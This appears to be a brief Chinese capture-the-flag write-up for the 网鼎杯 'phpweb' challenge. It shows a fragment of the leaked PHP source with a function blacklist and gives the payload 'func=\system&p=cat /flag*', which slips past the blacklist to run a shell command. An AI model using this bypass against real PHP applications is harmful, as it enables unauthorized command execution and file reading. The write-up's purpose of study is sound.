网鼎杯-phpweb

找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了
网鼎杯-phpweb_第1张图片

func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } } ?>

网鼎杯-phpweb_第2张图片

payload:
func=\system&p=cat /flag*

你可能感兴趣的:(CTF)